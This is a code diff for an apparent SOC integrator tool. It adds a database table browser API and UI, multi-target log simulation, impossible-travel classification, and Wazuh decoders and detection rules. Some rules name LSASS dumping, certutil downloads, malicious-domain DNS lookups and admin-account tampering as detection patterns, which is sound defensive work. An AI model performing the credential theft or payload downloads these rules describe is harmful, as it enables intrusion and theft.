+                    "schema": schema,
+                    "table": table,
+                    "row_count": row_count,
+                    "estimated_rows": int(item.get("estimated_rows", 0) or 0),
+                    "size_bytes": int(item.get("size_bytes", 0) or 0),
+                    "size_pretty": str(item.get("size_pretty") or "0 bytes"),
+                }
+            )
+
+    return ApiResponse(
+        data={
+            "database": settings.soc_integrator_db_name,
+            "generated_at": datetime.now(timezone.utc).isoformat(),
+            "tables": rows,
+        }
+    )
+
+
+@app.get(
+    "/monitor/db/tables/{table_name}/rows",
+    response_model=ApiResponse,
+    dependencies=[Depends(require_internal_api_key)],
+    summary="List rows from selected table",
+    description="Return rows from a selected public table with pagination.",
+)
+async def monitor_db_table_rows(
+    table_name: str,
+    limit: int = 50,
+    offset: int = 0,
+) -> ApiResponse:
+    table = str(table_name or "").strip()
+    if not table:
+        raise HTTPException(status_code=400, detail="table_name is required")
+
+    page_limit = max(1, min(int(limit), 500))
+    page_offset = max(0, int(offset))
+
+    with get_conn() as conn, conn.cursor() as cur:
+        cur.execute(
+            """
+            SELECT 1
+            FROM pg_tables
+            WHERE schemaname = 'public' AND tablename = %s
+            LIMIT 1
+            """,
+            (table,),
+        )
+        if not cur.fetchone():
+            raise HTTPException(status_code=404, detail=f"table '{table}' not found in schema public")
+
+        cur.execute(
+            sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
+                sql.Identifier("public"),
+                sql.Identifier(table),
+            )
+        )
+        total_row = cur.fetchone() or {}
+        total = int(total_row.get("cnt", 0) or 0)
+
+        cur.execute(
+            sql.SQL("SELECT * FROM {}.{} ORDER BY 1 DESC LIMIT %s OFFSET %s").format(
+                sql.Identifier("public"),
+                sql.Identifier(table),
+            ),
+            (page_limit, page_offset),
+        )
+        rows = [dict(item) for item in (cur.fetchall() or [])]
+
+    return ApiResponse(
+        data={
+            "table": table,
+            "limit": page_limit,
+            "offset": page_offset,
+            "total": total,
+            "rows": rows,
+        }
+    )
+
+
+@app.get(
     "/monitor/systems",
     response_model=ApiResponse,
     dependencies=[Depends(require_internal_api_key)],

soc-integrator/app/services/mvp_service.py

         return "low"
 
     def _event_type_from_text(self, text: str, parsed: dict[str, str]) -> str:
-        explicit = parsed.get("event_type")
+        explicit = str(parsed.get("event_type") or "").strip().lower()
+        usecase_id = str(parsed.get("usecase_id") or "").strip().upper()
+        section = str(parsed.get("section") or "").strip().upper()
+        source = str(parsed.get("source") or "").strip().lower()
+        success = str(parsed.get("success") or "").strip().lower()
+        has_geo = bool(parsed.get("country") or parsed.get("src_lat") or parsed.get("src_lon"))
+        has_user = bool(parsed.get("user"))
+        has_src_ip = bool(parsed.get("src_ip") or parsed.get("srcip"))
+        explicit_success_login = explicit in {
+            "vpn_login_success",
+            "windows_auth_success",
+            "auth_success",
+        }
+
+        # Production-first C1 detection:
+        # successful auth/login + geo context on vpn/windows identity streams.
+        if (
+            (source in {"vpn", "fortigate", "windows", "identity"} or "vpn" in source)
+            and has_geo
+            and has_user
+            and has_src_ip
+            and (success == "true" or explicit_success_login)
+        ):
+            return "c1_impossible_travel"
+
+        # Legacy simulator markers remain supported as fallback.
+        if usecase_id.startswith("C1") or section == "C1":
+            return "c1_impossible_travel"
+        if explicit in {"c1_impossible_travel", "impossible_travel"}:
+            return "c1_impossible_travel"
+        if explicit == "vpn_geo_anomaly":
+            return "vpn_geo_anomaly"
         if explicit:
             return explicit
         lowered = text.lower()
+        if "impossible travel" in lowered:
+            return "c1_impossible_travel"
         if "vpn" in lowered and ("geo" in lowered or "country" in lowered):
             return "vpn_geo_anomaly"
         if "domain" in lowered or "dns" in lowered:

soc-integrator/app/ui/assets/app.js

   }
 }
 
+const SIM_SCRIPT_DESCRIPTIONS = {
+  fortigate: "FortiGate firewall telemetry simulator (40F/60F/80F/501E) for network and security events.",
+  endpoint: "Windows/macOS/Linux endpoint-agent simulator for process, auth, and endpoint behavior logs.",
+  cisco: "Cisco ASA/IOS network log simulator for parser/rule coverage and telemetry validation.",
+  proposal_required: "Appendix A required-use-case simulator (A1-A4) for proposal/UAT coverage.",
+  proposal_appendix_b: "Appendix B optional-use-case simulator (B1-B3), including log-loss test flow.",
+  proposal_appendix_c: "Appendix C future-enhancement simulator (C1-C3 currently implemented).",
+  wazuh_test: "Generic Wazuh baseline test events for connectivity and ingest sanity checks.",
+};
+
+const SIM_SCRIPT_TARGET_OPTIONS = {
+  fortigate: ["all", "501E", "80F", "60F", "40F"],
+  endpoint: ["all", "windows", "mac", "linux"],
+  cisco: ["all", "asa_acl_deny", "asa_vpn_auth_fail", "ios_login_fail", "ios_config_change"],
+  proposal_required: ["all", "a1", "a2", "a3", "a4"],
+  proposal_appendix_b: ["all", "b1", "b2", "b3"],
+  proposal_appendix_c: ["all", "c1", "c2", "c3"],
+  wazuh_test: ["all", "ioc_dns", "ioc_ips", "vpn_outside_th", "windows_auth_fail"],
+};
+
 window.socUi = function socUi() {
   return {
     tabs: [
       { key: "overview", label: "Overview" },
       { key: "systems", label: "Systems" },
+      { key: "database", label: "Database" },
       { key: "monitoring", label: "Monitoring" },
       { key: "ioc", label: "IOC" },
       { key: "geoip", label: "GeoIP" },
       lastRefreshAt: null,
       timerId: null,
     },
+    dbTables: {
+      data: null,
+      loading: false,
+      lastRefreshAt: null,
+    },
+    dbBrowser: {
+      selectedTable: "",
+      rows: null,
+      loading: false,
+      limit: 50,
+      offset: 0,
+    },
     simLogs: {
       runs: null,
       startResult: null,
       timerId: null,
       form: {
         script: "fortigate",
-        target: "all",
+        targets: ["all"],
         scenario: "all",
         count: 1,
         delay_seconds: 0.3,
       this.loadAutoSync();
       this.loadCState();
       this.loadSystemsMonitor();
+      this.loadDbTables();
       this.loadSimRuns();
       this.startSimLogsAutoRefresh();
       this.startSystemsMonitorAutoRefresh();
       return this.simLogs.form.script === "endpoint";
     },
 
+    simScriptDescription() {
+      const key = String(this.simLogs.form.script || "").trim();
+      return SIM_SCRIPT_DESCRIPTIONS[key] || "No description available for this script.";
+    },
+
+    simTargetOptions() {
+      const key = String(this.simLogs.form.script || "").trim();
+      return SIM_SCRIPT_TARGET_OPTIONS[key] || ["all"];
+    },
+
+    simTargetSelectionChanged() {
+      const options = this.simTargetOptions();
+      const selected = Array.isArray(this.simLogs.form.targets) ? [...this.simLogs.form.targets] : [];
+      let valid = selected.filter((item) => options.includes(item));
+      if (valid.includes("all") && valid.length > 1) {
+        valid = ["all"];
+      }
+      if (!valid.length) {
+        valid = ["all"];
+      }
+      this.simLogs.form.targets = valid;
+    },
+
+    onSimScriptChange() {
+      this.simTargetSelectionChanged();
+    },
+
+    selectedTargetsForRun() {
+      const options = this.simTargetOptions();
+      let selected = Array.isArray(this.simLogs.form.targets) ? [...this.simLogs.form.targets] : [];
+      selected = selected.filter((item) => options.includes(item));
+      if (!selected.length || selected.includes("all")) {
+        return ["all"];
+      }
+      return selected;
+    },
+
     systemsStatusClass(status) {
       if (status === "ok") {
         return "status-ok";
       }
     },
 
+    async loadDbTables() {
+      try {
+        if (!this.internalApiKey) {
+          return;
+        }
+        this.dbTables.loading = true;
+        this.dbTables.data = await this.apiCall("/monitor/db/tables", {
+          internal: true,
+        });
+        this.dbTables.lastRefreshAt = new Date().toISOString();
+        if (!this.dbBrowser.selectedTable) {
+          const tables = this.dbTableRows();
+          if (tables.length > 0) {
+            this.dbBrowser.selectedTable = String(tables[0].table || "");
+            await this.loadDbRows();
+          }
+        }
+      } catch (err) {
+        this.setErr("Database tables failed", err);
+      } finally {
+        this.dbTables.loading = false;
+      }
+    },
+
+    dbTableRows() {
+      const root = this.unwrapApiData(this.dbTables.data) || {};
+      const tables = Array.isArray(root.tables) ? root.tables : [];
+      return tables.map((row, index) => this.normalizeTableRow(row, index));
+    },
+
+    async loadDbRows() {
+      try {
+        const table = String(this.dbBrowser.selectedTable || "").trim();
+        if (!table) {
+          this.dbBrowser.rows = null;
+          return;
+        }
+        this.dbBrowser.loading = true;
+        const limit = Math.max(1, Math.min(500, Number(this.dbBrowser.limit || 50)));
+        const offset = Math.max(0, Number(this.dbBrowser.offset || 0));
+        this.dbBrowser.rows = await this.apiCall(
+          `/monitor/db/tables/${encodeURIComponent(table)}/rows?limit=${limit}&offset=${offset}`,
+          { internal: true },
+        );
+      } catch (err) {
+        this.setErr("Database rows failed", err);
+      } finally {
+        this.dbBrowser.loading = false;
+      }
+    },
+
+    dbSelectedRows() {
+      const root = this.unwrapApiData(this.dbBrowser.rows) || {};
+      const rows = Array.isArray(root.rows) ? root.rows : [];
+      return rows.map((row, index) => this.normalizeTableRow(row, index));
+    },
+
+    dbSelectedColumns() {
+      return this.tableColumns(this.dbSelectedRows());
+    },
+
     async loadSimRuns() {
       try {
         if (!this.internalApiKey) {
 
     async startSimRun() {
       try {
-        const payload = {
-          script: this.simLogs.form.script,
-          target: this.simLogs.form.target || "all",
-          scenario: this.simLogs.form.scenario || "all",
-          count: Number(this.simLogs.form.count || 1),
-          delay_seconds: Number(this.simLogs.form.delay_seconds || 0.3),
-          forever: Boolean(this.simLogs.form.forever),
+        const targets = this.selectedTargetsForRun();
+        const results = [];
+        for (const target of targets) {
+          const payload = {
+            script: this.simLogs.form.script,
+            target,
+            scenario: this.simLogs.form.scenario || "all",
+            count: Number(this.simLogs.form.count || 1),
+            delay_seconds: Number(this.simLogs.form.delay_seconds || 0.3),
+            forever: Boolean(this.simLogs.form.forever),
+          };
+          const result = await this.apiCall("/sim/logs/start", {
+            method: "POST",
+            internal: true,
+            json: payload,
+          });
+          results.push({ target, result });
+        }
+        this.simLogs.startResult = {
+          data: {
+            started_targets: targets,
+            runs: results.map((item) => ({
+              target: item.target,
+              run: this.unwrapApiData(item.result)?.run || null,
+            })),
+          },
         };
-        this.simLogs.startResult = await this.apiCall("/sim/logs/start", {
-          method: "POST",
-          internal: true,
-          json: payload,
-        });
         await this.loadSimRuns();
-        const started = this.unwrapApiData(this.simLogs.startResult)?.run;
+        const started = results
+          .map((item) => this.unwrapApiData(item.result)?.run)
+          .find((run) => run && run.run_id);
         if (started && started.run_id) {
           this.simLogs.selectedRunId = started.run_id;
           await this.loadSimOutput(started.run_id);

soc-integrator/app/ui/index.html

     <title>SOC Integrator Admin</title>
     <script src="https://cdn.tailwindcss.com"></script>
     <script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js"></script>
-    <link rel="stylesheet" href="/ui/assets/styles.css?v=20260303-17" />
-    <script src="/ui/assets/app.js?v=20260303-17"></script>
+    <link rel="stylesheet" href="/ui/assets/styles.css?v=20260304-04" />
+    <script src="/ui/assets/app.js?v=20260304-04"></script>
   </head>
   <body class="bg-slate-100 text-slate-800" x-data="socUi()" x-init="init()">
     <div class="mx-auto w-full max-w-none px-3 py-4 md:px-5 md:py-6">
               <div class="grid gap-3 md:grid-cols-3 lg:grid-cols-6">
                 <label class="text-sm">
                   <span class="input-label">Script</span>
-                  <select class="input" x-model="simLogs.form.script">
+                  <select class="input" x-model="simLogs.form.script" @change="onSimScriptChange()">
                     <option value="fortigate">fortigate</option>
                     <option value="endpoint">endpoint</option>
                     <option value="cisco">cisco</option>
                     <option value="proposal_appendix_c">proposal_appendix_c</option>
                     <option value="wazuh_test">wazuh_test</option>
                   </select>
+                  <div class="mt-1 text-xs text-slate-500" x-text="simScriptDescription()"></div>
                 </label>
-                <label class="text-sm">
-                  <span class="input-label">Target</span>
-                  <input class="input" x-model="simLogs.form.target" placeholder="all" />
+                <label class="text-sm md:col-span-2">
+                  <span class="input-label">Target (multi-select)</span>
+                  <div class="rounded-md border border-slate-200 bg-white p-2">
+                    <div class="grid grid-cols-2 gap-2">
+                      <template x-for="option in simTargetOptions()" :key="`target-${option}`">
+                        <label class="inline-flex items-center gap-2 text-xs text-slate-700">
+                          <input type="checkbox" class="h-4 w-4" :value="option" x-model="simLogs.form.targets" @change="simTargetSelectionChanged()" />
+                          <span x-text="option"></span>
+                        </label>
+                      </template>
+                    </div>
+                  </div>
                 </label>
                 <label class="text-sm" x-show="simScriptUsesScenario()">
                   <span class="input-label">Scenario</span>
               </div>
             </div>
 
+            <div class="panel-block">
+              <div class="mb-2 flex flex-wrap items-center gap-2">
+                <h3 class="panel-subtitle mb-0">Database Tables</h3>
+                <button class="btn btn-primary" @click="loadDbTables()">Refresh Tables</button>
+                <span class="text-xs text-slate-500" x-text="dbTables.loading ? 'Loading...' : 'Idle'"></span>
+                <span class="text-xs text-slate-500" x-text="dbTables.lastRefreshAt ? `Last refresh: ${dbTables.lastRefreshAt}` : 'Not refreshed yet'"></span>
+              </div>
+              <div class="table-wrap mt-2" x-show="dbTableRows().length">
+                <table class="data-table">
+                  <thead>
+                    <tr>
+                      <th>schema</th>
+                      <th>table</th>
+                      <th>row_count</th>
+                      <th>estimated_rows</th>
+                      <th>size_pretty</th>
+                      <th>size_bytes</th>
+                    </tr>
+                  </thead>
+                  <tbody>
+                    <template x-for="(row, idx) in dbTableRows()" :key="idx">
+                      <tr>
+                        <td x-text="cellText(row.schema)"></td>
+                        <td x-text="cellText(row.table)"></td>
+                        <td x-text="cellText(row.row_count)"></td>
+                        <td x-text="cellText(row.estimated_rows)"></td>
+                        <td x-text="cellText(row.size_pretty)"></td>
+                        <td x-text="cellText(row.size_bytes)"></td>
+                      </tr>
+                    </template>
+                  </tbody>
+                </table>
+              </div>
+              <div class="text-xs text-slate-500" x-show="!dbTableRows().length">No database table data</div>
+            </div>
+
             <div class="grid gap-3 lg:grid-cols-2">
               <template x-for="meta in systemsCardMeta" :key="`table-${meta.key}`">
                 <div class="panel-block">
             </div>
           </section>
 
+          <section x-show="activeTab === 'database'" x-cloak class="admin-card space-y-4">
+            <div class="panel-block">
+              <div class="mb-2 flex flex-wrap items-center gap-2">
+                <h3 class="panel-subtitle mb-0">Database Table Browser</h3>
+                <button class="btn btn-primary" @click="loadDbTables()">Refresh Tables</button>
+                <button class="btn btn-neutral" @click="loadDbRows()">Load Rows</button>
+                <span class="text-xs text-slate-500" x-text="dbBrowser.loading ? 'Loading rows...' : 'Idle'"></span>
+              </div>
+              <div class="grid gap-3 md:grid-cols-4">
+                <label class="text-sm md:col-span-2">
+                  <span class="input-label">Table</span>
+                  <select class="input" x-model="dbBrowser.selectedTable">
+                    <option value="">Select table</option>
+                    <template x-for="(row, idx) in dbTableRows()" :key="`db-table-${idx}`">
+                      <option :value="row.table" x-text="`${row.schema}.${row.table}`"></option>
+                    </template>
+                  </select>
+                </label>
+                <label class="text-sm">
+                  <span class="input-label">Limit</span>
+                  <input class="input" type="number" min="1" max="500" x-model.number="dbBrowser.limit" />
+                </label>
+                <label class="text-sm">
+                  <span class="input-label">Offset</span>
+                  <input class="input" type="number" min="0" x-model.number="dbBrowser.offset" />
+                </label>
+              </div>
+              <pre class="json-box mt-2" x-text="pretty(dbBrowser.rows)"></pre>
+              <div class="table-wrap mt-2" x-show="dbSelectedRows().length">
+                <table class="data-table">
+                  <thead>
+                    <tr>
+                      <template x-for="col in dbSelectedColumns()" :key="col">
+                        <th x-text="col"></th>
+                      </template>
+                    </tr>
+                  </thead>
+                  <tbody>
+                    <template x-for="(row, idx) in dbSelectedRows()" :key="`db-row-${idx}`">
+                      <tr>
+                        <template x-for="col in dbSelectedColumns()" :key="col">
+                          <td x-text="cellText(row[col])"></td>
+                        </template>
+                      </tr>
+                    </template>
+                  </tbody>
+                </table>
+              </div>
+              <div class="text-xs text-slate-500" x-show="!dbSelectedRows().length">No rows loaded</div>
+            </div>
+          </section>
+
           <section x-show="activeTab === 'monitoring'" x-cloak class="admin-card space-y-4">
             <div class="panel-block">
               <div class="mb-2 flex flex-wrap items-center gap-2">

wazuh-docker/single-node/config/wazuh_cluster/local_decoder.xml

-<decoders>
-</decoders>
+<!-- SOC MVP local decoders (minimal production-safe set) -->
+
+<decoder name="soc-kv-base">
+  <prematch>soc_mvp_test=true</prematch>
+</decoder>
+
+<decoder name="soc-dns-ioc">
+  <parent>soc-kv-base</parent>
+  <prematch>source=dns</prematch>
+</decoder>
+
+<decoder name="soc-vmware-auth">
+  <parent>soc-kv-base</parent>
+  <prematch>source=vmware</prematch>
+</decoder>
+
+<decoder name="soc-log-monitor">
+  <parent>soc-kv-base</parent>
+  <prematch>source=log_monitor</prematch>
+</decoder>
+
+<decoder name="soc-windows-sysmon">
+  <parent>soc-kv-base</parent>
+  <prematch>source=windows_sysmon</prematch>
+</decoder>

wazuh-docker/single-node/config/wazuh_cluster/local_rules.xml

   <rule id="100522" level="12"><if_sid>100230</if_sid><match>usecase_id=C3-02</match><description>C3-02 SMB/RDP Lateral Burst Pattern</description><group>soc_mvp_test,appendix_c,c3,lateral_movement,</group></rule>
   <rule id="100523" level="12"><if_sid>100230</if_sid><match>usecase_id=C3-03</match><description>C3-03 Admin Account Accessing Many Servers Rapidly</description><group>soc_mvp_test,appendix_c,c3,lateral_movement,</group></rule>
   <rule id="100524" level="8"><if_sid>100230</if_sid><match>usecase_id=C3-04</match><description>C3-04 Internal Scanning / Enumeration Behavior</description><group>soc_mvp_test,appendix_c,c3,recon,</group></rule>
+  <!-- ========================= -->
+  <!-- Production profile rules -->
+  <!-- ========================= -->
+  <!--
+    Production profile (second profile):
+    - Does not depend on simulation marker fields (soc_mvp_test/usecase_id)
+    - Uses source-like patterns that can appear in real logs
+    - Rule IDs are separated from simulation profile in 110xxx range
+  -->
+
+  <rule id="110200" level="3">
+    <description>SOC MVP production profile enabled</description>
+    <group>soc_mvp_prod,baseline,</group>
+  </rule>
+
+  <!-- Appendix A1: DNS / Firewall IOC -->
+  <rule id="110301" level="8">
+    <decoded_as>soc-dns-ioc</decoded_as>
+    <match>event_type=ioc_dns_traffic</match>
+    <match>malicious.example</match>
+    <description>A1 production: DNS query to malicious domain indicator</description>
+    <group>soc_mvp_prod,appendix_a,a1,ioc,dns,</group>
+  </rule>
+  <rule id="110302" level="8">
+    <decoded_as>soc-dns-ioc</decoded_as>
+    <match>event_type=ioc_domain_match</match>
+    <description>A1 production: DNS IOC domain match event</description>
+    <group>soc_mvp_prod,appendix_a,a1,ioc,dns,</group>
+  </rule>
+
+  <!-- Appendix A2: FortiGate IPS/IDS & Firewall -->
+  <rule id="110311" level="12">
+    <match>vendor=fortinet</match>
+    <match>dstport=3389</match>
+    <match>action="accept"</match>
+    <description>A2 production: FortiGate allowed RDP traffic detected</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
+  </rule>
+  <rule id="110312" level="12">
+    <match>vendor=fortinet</match>
+    <match>action="password-change"</match>
+    <description>A2 production: FortiGate admin password change</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
+  </rule>
+  <rule id="110313" level="12">
+    <match>vendor=fortinet</match>
+    <match>action="create-admin"</match>
+    <description>A2 production: FortiGate admin account creation</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
+  </rule>
+  <rule id="110314" level="12">
+    <match>vendor=fortinet</match>
+    <match>action="disable-email-notification"</match>
+    <description>A2 production: FortiGate email notification disabled</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
+  </rule>
+  <rule id="110315" level="5">
+    <match>vendor=fortinet</match>
+    <match>action="download-config"</match>
+    <description>A2 production: FortiGate configuration download</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
+  </rule>
+  <rule id="110316" level="8">
+    <match>vendor=fortinet</match>
+    <match>subtype="ips"</match>
+    <match>severity="critical"</match>
+    <description>A2 production: FortiGate critical IPS alert</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,ips,</group>
+  </rule>
+  <rule id="110317" level="5">
+    <match>vendor=fortinet</match>
+    <match>event_type=port_scan</match>
+    <description>A2 production: FortiGate port scanning indicator</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,recon,</group>
+  </rule>
+  <rule id="110318" level="8">
+    <match>vendor=fortinet</match>
+    <match>event_type=ioc_detection</match>
+    <description>A2 production: FortiGate IOC detection event</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,ioc,</group>
+  </rule>
+  <rule id="110320" level="8">
+    <match>vendor=fortinet</match>
+    <match>event_type=malicious_ip_communication</match>
+    <description>A2 production: Communication to malicious IP detected</description>
+    <group>soc_mvp_prod,appendix_a,a2,fortigate,ioc,</group>
+  </rule>
+
+  <!-- Appendix A3: FortiGate VPN -->
+  <rule id="110331" level="12">
+    <match>subtype="vpn"</match>
+    <match>success=true</match>
+    <match>guest</match>
+    <description>A3 production: VPN success by guest account</description>
+    <group>soc_mvp_prod,appendix_a,a3,vpn,</group>
+  </rule>
+  <rule id="110333" level="12">
+    <match>subtype="vpn"</match>
+    <match>event_type=vpn_bruteforce_success</match>
+    <description>A3 production: VPN brute-force success indicator</description>
+    <group>soc_mvp_prod,appendix_a,a3,vpn,</group>
+  </rule>
+  <rule id="110335" level="12">
+    <match>subtype="vpn"</match>
+    <match>success=true</match>
+    <match>country=</match>
+    <description>A3 production: VPN success with country context (geo-anomaly candidate)</description>
+    <group>soc_mvp_prod,appendix_a,a3,vpn,geo,</group>
+  </rule>
+
+  <!-- Appendix A4: Windows / Active Directory -->
+  <rule id="110341" level="8">
+    <match>source=windows</match>
+    <match>event_id=4625</match>
+    <match>is_admin=true</match>
+    <description>A4 production: Privileged account authentication failures</description>
+    <group>soc_mvp_prod,appendix_a,a4,windows,auth_fail,</group>
+  </rule>
+  <rule id="110342" level="8">
+    <match>source=windows</match>
+    <match>event_id=4625</match>
+    <match>is_service=true</match>
+    <description>A4 production: Service account authentication failures</description>
+    <group>soc_mvp_prod,appendix_a,a4,windows,auth_fail,</group>
+  </rule>
+  <rule id="110346" level="12">
+    <match>source=windows</match>
+    <match>event_id=4624</match>
+    <match>src_ip=</match>
+    <description>A4 production: Windows successful authentication with source IP context</description>
+    <group>soc_mvp_prod,appendix_a,a4,windows,auth_success,</group>
+  </rule>
+  <rule id="110352" level="12">
+    <match>source=windows</match>
+    <match>event_id=4728</match>
+    <match>target_group=</match>
+    <description>A4 production: Account added to privileged group (domain scope)</description>
+    <group>soc_mvp_prod,appendix_a,a4,windows,privilege,</group>
+  </rule>
+  <rule id="110353" level="12">
+    <match>source=windows</match>
+    <match>event_id=4732</match>
+    <match>target_group=</match>
+    <description>A4 production: Account added to privileged group (local scope)</description>
+    <group>soc_mvp_prod,appendix_a,a4,windows,privilege,</group>
+  </rule>
+
+  <!-- Appendix B1: VMware -->
+  <rule id="110401" level="12">
+    <decoded_as>soc-vmware-auth</decoded_as>
+    <match>event_type=vmware_</match>
+    <match>_fail_success</match>
+    <description>B1 production: vCenter login burst pattern</description>
+    <group>soc_mvp_prod,appendix_b,b1,vmware,</group>
+  </rule>
+  <rule id="110402" level="8">
+    <decoded_as>soc-vmware-auth</decoded_as>
+    <match>event_type=vmware_esxi_enable_ssh</match>
+    <description>B1 production: ESXi SSH enabled</description>
+    <group>soc_mvp_prod,appendix_b,b1,vmware,</group>
+  </rule>
+
+  <!-- Appendix B2: Log monitoring -->
+  <rule id="110411" level="5">
+    <decoded_as>soc-log-monitor</decoded_as>
+    <match>event_type=log_loss_detection</match>
+    <match>missing_stream=</match>
+    <description>B2 production: Log loss detection signal</description>
+    <group>soc_mvp_prod,appendix_b,b2,logmonitor,</group>
+  </rule>
+
+  <!-- Appendix B3: Sysmon -->
+  <rule id="110421" level="12">
+    <decoded_as>soc-windows-sysmon</decoded_as>
+    <match>target_process=lsass.exe</match>
+    <description>B3 production: LSASS dump behavior</description>
+    <group>soc_mvp_prod,appendix_b,b3,sysmon,credential_access,</group>
+  </rule>
+  <rule id="110426" level="8">
+    <decoded_as>soc-windows-sysmon</decoded_as>
+    <match>process=certutil.exe</match>
+    <description>B3 production: CertUtil download pattern</description>
+    <group>soc_mvp_prod,appendix_b,b3,sysmon,</group>
+  </rule>
+
+  <!-- Appendix C1-C3: future enhancement (production-prep heuristics) -->
+  <rule id="110501" level="12">
+    <match>event_type=c1_impossible_travel</match>
+    <description>C1 production: Impossible travel correlated event</description>
+    <group>soc_mvp_prod,appendix_c,c1,identity,</group>
+  </rule>
+  <rule id="110511" level="12">
+    <match>event_type=c2_credential_abuse</match>
+    <description>C2 production: Credential abuse correlated event</description>
+    <group>soc_mvp_prod,appendix_c,c2,identity,</group>
+  </rule>
+  <rule id="110521" level="12">
+    <match>event_type=c3_lateral_movement</match>
+    <description>C3 production: Lateral movement correlated event</description>
+    <group>soc_mvp_prod,appendix_c,c3,lateral_movement,</group>
+  </rule>
 </group>

wazuh-docker/single-node/docker-compose.yml

       - ./config/wazuh_indexer_ssl_certs/wazuh.manager.pem:/etc/ssl/filebeat.pem
       - ./config/wazuh_indexer_ssl_certs/wazuh.manager-key.pem:/etc/ssl/filebeat.key
       - ./config/wazuh_cluster/wazuh_manager.conf:/var/ossec/etc/ossec.conf
+      - ./config/wazuh_cluster/local_decoder.xml:/var/ossec/etc/decoders/local_decoder.xml
       - ./config/wazuh_cluster/local_rules.xml:/var/ossec/etc/rules/local_rules.xml
 
   wazuh.indexer: